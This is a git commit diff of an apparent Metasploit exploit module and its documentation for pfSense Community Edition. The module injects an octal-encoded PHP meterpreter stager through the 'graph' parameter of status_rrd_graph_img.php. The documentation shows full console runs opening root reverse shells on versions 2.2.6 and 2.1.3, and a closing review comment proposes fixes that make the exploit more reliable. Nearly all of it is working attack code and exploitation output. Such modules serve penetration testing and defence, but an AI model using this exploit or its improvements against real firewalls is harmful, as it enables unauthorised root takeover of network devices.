parent
bc088cb379
commit
8f0e41e159
|
@ -27,44 +27,22 @@
|
||||||
### pfSense Community Edition 2.2.6-RELEASE
|
### pfSense Community Edition 2.2.6-RELEASE
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > options
|
msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
|
||||||
|
RHOST => 2.2.2.2
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
|
||||||
|
LHOST => 1.1.1.1
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
||||||
|
|
||||||
Module options (exploit/unix/http/pfsense_graph_injection_exec):
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
PASSWORD pfsense yes Password to login with
|
|
||||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
||||||
RHOST 192.168.75.132 yes The target address
|
|
||||||
RPORT 443 yes The target port (TCP)
|
|
||||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
|
||||||
USERNAME admin yes User to login with
|
|
||||||
VHOST no HTTP server virtual host
|
|
||||||
|
|
||||||
|
|
||||||
Payload options (php/meterpreter/reverse_tcp):
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST 192.168.75.128 yes The listen address
|
|
||||||
LPORT 80 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
Exploit target:
|
|
||||||
|
|
||||||
Id Name
|
|
||||||
-- ----
|
|
||||||
0 Automatic Target
|
|
||||||
|
|
||||||
|
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.75.128:80
|
|
||||||
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
|
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
|
||||||
[*] Triggering the payload, root shell incoming...
|
[*] Payload uploaded successfully, executing
|
||||||
[*] Sending stage (37543 bytes) to 192.168.75.132
|
[*] Sending stage (37543 bytes) to 2.2.2.2
|
||||||
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600
|
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : pfSense.localdomain
|
||||||
|
OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
|
||||||
|
Meterpreter : php/freebsd
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: root (0)
|
Server username: root (0)
|
||||||
meterpreter >
|
meterpreter >
|
||||||
|
@ -73,45 +51,20 @@ meterpreter >
|
||||||
### pfSense Community Edition 2.1.3-RELEASE
|
### pfSense Community Edition 2.1.3-RELEASE
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > options
|
msf > use exploit/unix/http/pfsense_graph_injection_exec
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
|
||||||
Module options (exploit/unix/http/pfsense_graph_injection_exec):
|
RHOST => 2.2.2.2
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
|
||||||
Name Current Setting Required Description
|
LHOST => 1.1.1.1
|
||||||
---- --------------- -------- -----------
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
|
||||||
PASSWORD pfsense yes Password to login with
|
PAYLOAD => php/reverse_php
|
||||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
||||||
RHOST 192.168.75.131 yes The target address
|
|
||||||
RPORT 443 yes The target port (TCP)
|
|
||||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
|
||||||
USERNAME admin yes User to login with
|
|
||||||
VHOST no HTTP server virtual host
|
|
||||||
|
|
||||||
|
|
||||||
Payload options (php/meterpreter/reverse_tcp):
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST 192.168.75.128 yes The listen address
|
|
||||||
LPORT 80 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
Exploit target:
|
|
||||||
|
|
||||||
Id Name
|
|
||||||
-- ----
|
|
||||||
0 Automatic Target
|
|
||||||
|
|
||||||
|
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.75.128:80
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
|
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
|
||||||
[*] Triggering the payload, root shell incoming...
|
[*] Payload uploaded successfully, executing
|
||||||
[*] Sending stage (37543 bytes) to 192.168.75.131
|
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
|
||||||
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600
|
uname -a
|
||||||
|
|
||||||
meterpreter > getuid
|
FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
|
||||||
Server username: root (0)
|
|
||||||
meterpreter >
|
|
||||||
```
|
```
|
||||||
|
|
|
@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Encoder' => 'php/base64',
|
'Encoder' => 'php/base64',
|
||||||
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
|
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
|
||||||
},
|
},
|
||||||
|
|
||||||
'DisclosureDate' => 'Apr 18, 2016',
|
'DisclosureDate' => 'Apr 18, 2016',
|
||||||
'Platform' => 'php',
|
'Platform' => 'php',
|
||||||
'Arch' => ARCH_PHP,
|
'Arch' => ARCH_PHP,
|
||||||
|
@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
# If the device isn't fully setup, you get stuck at redirects to wizard.php
|
# If the device isn't fully setup, you get stuck at redirects to wizard.php
|
||||||
# however, this does NOT stop exploitation strangely
|
# however, this does NOT stop exploitation strangely
|
||||||
print_error("pfSense version not detected or wizard still enabled.")
|
print_error('pfSense version not detected or wizard still enabled.')
|
||||||
Gem::Version.new('0.0')
|
Gem::Version.new('0.0')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -116,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
begin
|
begin
|
||||||
cookie = login
|
cookie = login
|
||||||
version = detect_version(cookie)
|
version = detect_version(cookie)
|
||||||
filename = rand_text_alpha(rand(20))
|
filename = rand_text_alpha(rand(10))
|
||||||
|
|
||||||
# generate the PHP meterpreter payload
|
# generate the PHP meterpreter payload
|
||||||
stager = "echo \'<?php "
|
stager = 'echo \'<?php '
|
||||||
stager << payload.encode
|
stager << payload.encode
|
||||||
stager << "?>\' > #(unknown)"
|
stager << "?>\' > #(unknown)"
|
||||||
# here we begin the encoding process to
|
# here we begin the encoding process to
|
||||||
|
@ -127,25 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# don't look
|
# don't look
|
||||||
complete_stage = ""
|
complete_stage = ""
|
||||||
for i in 0..(stager.length()-1)
|
for i in 0..(stager.length()-1)
|
||||||
if "#{version}" =~ /2.2/
|
if version.to_s =~ /2.2/
|
||||||
complete_stage << "\\\\#{stager[i].ord.to_s(8)}"
|
complete_stage << '\\'
|
||||||
else
|
|
||||||
complete_stage << "\\#{stager[i].ord.to_s(8)}"
|
|
||||||
end
|
end
|
||||||
|
complete_stage << "\\#{stager[i].ord.to_s(8)}"
|
||||||
end
|
end
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
'uri' => '/status_rrd_graph_img.php',
|
'uri' => '/status_rrd_graph_img.php',
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => {
|
'cookie' => cookie,
|
||||||
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
|
|
||||||
'Accept' => '*/*',
|
|
||||||
'Accept-Language' => 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding' => 'gzip, deflate',
|
|
||||||
'Origin' => 'null',
|
|
||||||
'Cookie' => cookie,
|
|
||||||
'Connection' => 'close',
|
|
||||||
},
|
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'database' => '-throughput.rrd',
|
'database' => '-throughput.rrd',
|
||||||
'graph' => "file|printf '#{complete_stage}'|sh|echo",
|
'graph' => "file|printf '#{complete_stage}'|sh|echo",
|
||||||
|
@ -153,23 +143,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
)
|
)
|
||||||
|
|
||||||
if res && res.code == 200
|
if res && res.code == 200
|
||||||
print_status("Triggering the payload, root shell incoming...")
|
print_status('Payload uploaded successfully, executing')
|
||||||
else
|
else
|
||||||
print_error("Failed to upload the initial payload...")
|
print_error('Failed to upload payload...')
|
||||||
end
|
end
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => '/status_rrd_graph_img.php',
|
'uri' => '/status_rrd_graph_img.php',
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => {
|
'cookie' => cookie,
|
||||||
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
|
|
||||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
||||||
'Accept-Language' => 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding' => 'gzip, deflate',
|
|
||||||
'Cookie' => cookie,
|
|
||||||
'Connection' => 'close',
|
|
||||||
'Upgrade-Insecure-Requests' => '1',
|
|
||||||
},
|
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'database' => '-throughput.rrd',
|
'database' => '-throughput.rrd',
|
||||||
'graph' => "file|php #(unknown)|echo "
|
'graph' => "file|php #(unknown)|echo "
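Review bot: In the `@ -116,10 +115,10 @@` hunk, `filename = rand_text_alpha(rand(10))` can yield an empty name, since `rand(10)` returns 0 about one time in ten, which leaves the stager redirecting to `> ` and the later request running `php ` with no file, so the module would fail intermittently with no clear cause; a lower bound such as `filename = rand_text_alpha(rand(6..12))` avoids this. In the `@ -153,23 +143,15 @@` hunk the `else` branch only prints 'Failed to upload payload...' and then falls through to the execution request, so a failed upload is reported but never acted on; `fail_with(Failure::Unknown, 'Failed to upload payload')` would stop there instead. The `version.to_s =~ /2.2/` test in the encoding loop is unanchored and its `.` is a wildcard, so a direct Gem::Version comparison (the value comes from `Gem::Version.new` in detect_version) would state the intent more precisely, though I cannot see from these hunks every version string detect_version can return. The enclosing exploit method begins above the first of these hunks, and nothing visible removes the dropped file from the target afterwards.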
|
||||||
|
|